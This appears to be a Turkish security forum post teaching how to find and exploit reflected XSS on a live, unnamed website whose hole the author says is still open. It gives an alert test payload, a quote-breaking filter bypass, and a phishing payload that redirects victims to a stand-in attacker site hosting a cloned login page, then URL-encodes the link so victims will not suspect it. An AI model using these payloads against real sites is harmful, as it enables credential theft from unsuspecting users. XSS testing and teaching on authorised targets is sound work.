Uygulamalı XSS Açığı Bulma ve İstismar Etme

PwnLab.Me

Admin
Katılım
21 Ocak 2024
Mesajlar
202
Tepkime puanı
9
Puanları
18

Meriç Değirmencioğlu tarafından 4 Mart 2021 tarihinde yazılmıştır.​



Selamlar, bu konuda beraber XSS açığı bulacağız. Çoğu site bunu teorik olarak anlatmış. Bakalım işler gerçekte nasıl dönüyor.

İlk öncelikle nedir ne değildir bundan bahsedeyim.

Cross-Site Scripting güncel olarak web uygulamalarında bulunan bir güvenlik zafiyetidir. XSS Zafiyetleri client-side script enjeksiyonları yapmamıza olanak tanır.

XSS Zafiyeti, web uygulamasında kullanıcıdan veri alınarak bunun DOM Dökümasyonuna işlendiği her yerde ortaya çıkabilir. Aynı zamanda bazı filtrelemeler yardımıyla ortadan kalkabilir.

XSS Zafiyeti; temelde Self, Stored, Reflected, DOM Based XSS gibi çeşitli türlere ayrılmaktadır.

Şimdi kendimize bir hedef seçeceğiz ve manuel deneme yapmaya başlayacağız. Açık kapatılmadığı için site adresinden söz etmeyeceğim, ekran görüntüleri ile sorunsuz bir şekilde anlatım yapacağım.

Evet sitemize girdik ve bir textbox arıyoruz. Bu bir arama kutusu, iletişim formu veya ziyaretçi defteri olabilir. Ben bir arama kutusu buldum ve basit bir javascript kodu çalıştırmayı deniyorum. Kodumuz şu şekilde;

<script>alert("açık var");</script>
1705954708879.png


Evet siteyi kodlayan admin xss açığını önlemek için " (çift tırnak işareti) işaretinden sonrasının silinmesi için kod yazmış. Ama bu bizi vazgeçirmiyor. Ve aklımıza " işareti kullanmadan bir integer değişkenini alert fonksiyonu ile yazdırmak geliyor. Ayrıca yeşil renkle belirttiğim yerde ufak bir hata çıkıyor ve bir kod parçası gözüküyor. Ama şu an konumuz bu değil. Devam edelim.

1705954714298.png


Bunu arayalım bakalım etkili olacak mı?

1705954720182.png


Sonradan yaptığım incelemede bu güvenlik önlemini baypass etmeyi başardım işte şu kod ile:

"><script>alert("baypass edildi")</script>
Dikkat ettiyseniz başına "> ibaresini koydum. Demek ki kodlayan buna önlem almamış ve bu ibareyi koyduğumuzda onun kod satırını bitirip kendimiz yenisini yazmış oluyoruz.

Evet kodu başarıyla çalıştırmış bulunmaktayız arkada banner olduğu için sitenin güvenliği açısından karaladım. Peki bununu bulduk ama nasıl istismar edeceğiz?

XSS Yönlendirme ile Phishing Saldırısı

Bu saldırıda XSS açığını kullanarak kurbanı sitenin klonunu oluşturduğumuz kendi sitemize yönlendireceğiz.

"><script language="Javascript">window.location.href="https://saldirgansitesi.com/login.html"</script>
Bunu XSS açığı bulduğumuz sitenin link çubuğu kısmına yapıştırdığımızda belirttiğimiz siteye yönlendirecektir. Ve biz sitenin klonunu oluşturmuş olacağımız için şüphelenmeden girdiği bilgiler bize gelecek. Linkin son hali;

http://hedefsite.com/?r="><script language="Javascript">window.location.href="https://saldirgansitesi.com/login.html"</script>
Ama bu şekilde linki kurbana gönderirsek kanmayacaktır. Bunu biraz düzenleyelim. Kullanacağımız site: https://www.urlencoder.org

Sadece ?r= ibaresinden sonrakileri encode edeceğiz. Ve ortaya bu çıkacak. Şimdi biraz daha inandırıcı.

%22%3E%3Cscript%20language%3D%22Javascript%22%3Ewindow.location.href%3D%22https%3A%2F%2Fsaldirgansitesi.com%2Flogin.html%22%3C%2Fscript%3E
Evet bunu http://hedefsite.com/?r= den sonrasına yapıştıracağız. İstediğimiz siteye bu şekilde yönlendirmiş olduk.

{*/DAKİKALAR İÇERİSİNDE XSS AÇIĞINI TESPİT ETMEK/*}​

Buraya kadar her şey harika olsa da bu işlemler oldukça zaman alıcı. Bunları otomatikleştiren platformlar olmalı diye düşünmüş olabilirsiniz. Bu konuda burp suit aracının pro sürümü yararlı olur. Ayrıca bunu sağlayan web hizmetleri de mevcut. Üstelik çok daha düşük fiyatlara. Biz şimdilik ücretli bir web hizmetinin deneme hizmetini kullanarak aynı siteyi test edeceğiz. Site adresimiz: pentest-tools.com/website-vulnerability-scanning/xss-scanner-online bu araç sitedeki XSS açıklarını tarayacak. Hemen deneyelim.

1705954731772.png


Başarılı bir şekilde XSS açığını dakikalar içinde buldu ve rapor etti. Sayfayı aşağıya kaydırırsak bu raporu görebiliriz.

Umarım keyifli bir okuma olmuştur. Bir sonraki yazımda görüşmek üzere...
 
Geri
Üst